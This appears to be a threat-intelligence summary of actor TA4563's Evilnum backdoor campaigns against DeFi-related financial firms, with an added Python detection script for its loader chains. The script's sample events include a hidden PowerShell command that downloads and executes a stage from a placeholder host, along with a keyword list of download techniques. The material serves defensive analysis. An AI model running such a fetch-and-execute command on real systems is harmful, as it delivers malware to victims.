
TA4563 Uses Evilnum to Target Finance Industry Supporting Crypto

Threat actor TA4563 has been using the Evilnum backdoor for nearly two years to target several European financial and investment entities, specifically those in the DeFi industry.

How does Evilnum work?

  • To test which delivery method works best, the campaigns carrying the updated version of Evilnum use a mix of ISO, Microsoft Word, and shortcut (LNK) files.
  • To avoid detection, the malware includes multiple components that modify infection paths based on detected antivirus software.
  • Evilnum can be used for reconnaissance, data theft, and additional payload deployment.

Campaign details

2021 

  • The first campaign, in December 2021, attempted to deliver Word documents used to install the updated version of the Evilnum backdoor.
  • The phishing messages install several LNK loader components on the domain, which then use wscript to load the Evilnum payload and a JavaScript payload.

Early 2022 

  • This time, the group attempted to deliver multiple OneDrive URLs, each with an ISO or LNK attachment.
  • The actor used monetary inducements to persuade the recipients to launch the payload.
  • Following campaigns included the direct delivery of a compressed LNK file as an additional attempt to install Evilnum.

Mid 2022

TA4563 delivered Microsoft Word documents in mid-2022 campaigns in an attempt to download a remote template.

Evilnum details

  • Previous versions of Evilnum include both a JavaScript component and a C# component of the backdoor.
  • The backdoor restricts downloads to only one IP address per campaign to ensure that only the target can retrieve the malware.
  • The LNK loader executes PowerShell via cmd.exe, which then downloads two different payloads from the initial host.
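The two execution paths described above (the LNK loader that runs PowerShell through cmd.exe to fetch payloads, and the wscript-launched JavaScript loader from the 2021 campaign) are both visible in process-creation telemetry. The following is an added detection example written for this page, not code from Cyware, Proofpoint, or the malware itself. It runs over constructed process events; the field names, the explorer.exe -> cmd.exe -> powershell.exe heuristic, the download-keyword list, and the user-writable path list are all assumptions chosen for illustration.

```python
"""Flag the LNK -> cmd.exe -> PowerShell download chain and the wscript.exe
JavaScript loader over constructed process-creation events.

Added example for this page; the event schema and heuristics are assumptions.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name only, e.g. "cmd.exe" (assumed field)
    cmdline: str    # full command line (assumed field)


# Substrings that commonly mark PowerShell fetching content from a remote host.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "net.webclient", "start-bitstransfer", "iwr ")

# User-writable locations a dropped loader script would typically run from
# (paths are normalised to forward slashes before matching).
USER_WRITABLE = ("/appdata/local/temp/", "/appdata/roaming/",
                 "/downloads/", "/users/public/")


def detect_lnk_powershell_download(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """explorer.exe -> cmd.exe -> powershell.exe with a download keyword.

    A double-clicked shortcut is launched by explorer.exe, so that ancestry
    plus a remote fetch in the PowerShell command line approximates the LNK
    loader stage described for Evilnum.
    """
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    hits: List[Tuple[str, int]] = []
    for ev in events:
        if ev.image.lower() != "powershell.exe":
            continue
        parent = by_pid.get(ev.ppid)
        if parent is None or parent.image.lower() != "cmd.exe":
            continue
        grandparent = by_pid.get(parent.ppid)
        if grandparent is None or grandparent.image.lower() != "explorer.exe":
            continue
        if any(m in ev.cmdline.lower() for m in DOWNLOAD_MARKERS):
            hits.append(("lnk_cmd_powershell_download", ev.pid))
    return hits


def detect_wscript_js_loader(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """wscript.exe running a .js file from a user-writable directory."""
    hits: List[Tuple[str, int]] = []
    for ev in events:
        if ev.image.lower() != "wscript.exe":
            continue
        cl = ev.cmdline.lower().replace("\\", "/")
        if ".js" in cl and any(p in cl for p in USER_WRITABLE):
            hits.append(("wscript_js_from_user_path", ev.pid))
    return hits


def detect_evilnum_chain(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Run both rules and return (rule_name, pid) pairs in detection order."""
    return detect_lnk_powershell_download(events) + detect_wscript_js_loader(events)


# Constructed sample telemetry: one malicious chain plus benign activity.
# The host name is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    ProcEvent(1, 0, "explorer.exe", "explorer.exe"),
    ProcEvent(2, 1, "cmd.exe", "cmd.exe /c powershell -w hidden -c ..."),
    ProcEvent(3, 2, "powershell.exe",
              "powershell.exe -w hidden -c IEX((New-Object Net.WebClient)"
              ".DownloadString('http://payload.example.invalid/stage'))"),
    ProcEvent(4, 3, "wscript.exe",
              r'wscript.exe //E:JScript "C:\Users\alice\AppData\Local\Temp\load.js"'),
    # benign: an administrator running a one-off PowerShell command
    ProcEvent(5, 1, "cmd.exe", "cmd.exe"),
    ProcEvent(6, 5, "powershell.exe", "powershell.exe -c Get-Process"),
    # benign: a vendor maintenance script from Program Files
    ProcEvent(7, 1, "wscript.exe", r'wscript.exe "C:\Program Files\Vendor\tool.vbs"'),
]

if __name__ == "__main__":
    for rule, pid in detect_evilnum_chain(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Running the block prints two hits, pids 3 and 4, and leaves the benign cmd.exe -> PowerShell and Program Files wscript events alone. In production the same two rules would be expressed in the EDR's query language and tuned against the environment's legitimate shortcut and script usage.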

Payload details

  • The first payload executes two PowerShell scripts.
  • The first of these scripts decrypts a PNG and restarts the infection chain.
  • The second, larger PowerShell script loads C# code dynamically and sends screenshots to a C2 server.
  • The second payload contains two encrypted blobs: the first is decrypted to an executable and the second to a TMP file.


Conclusion

TA4563 has kept its compromise attempts tightly targeted while using various methods of delivery. Evilnum malware and the TA4563 group pose a risk to financial organizations, and as per the latest analysis, the malware is under active development.
Publisher: Cyware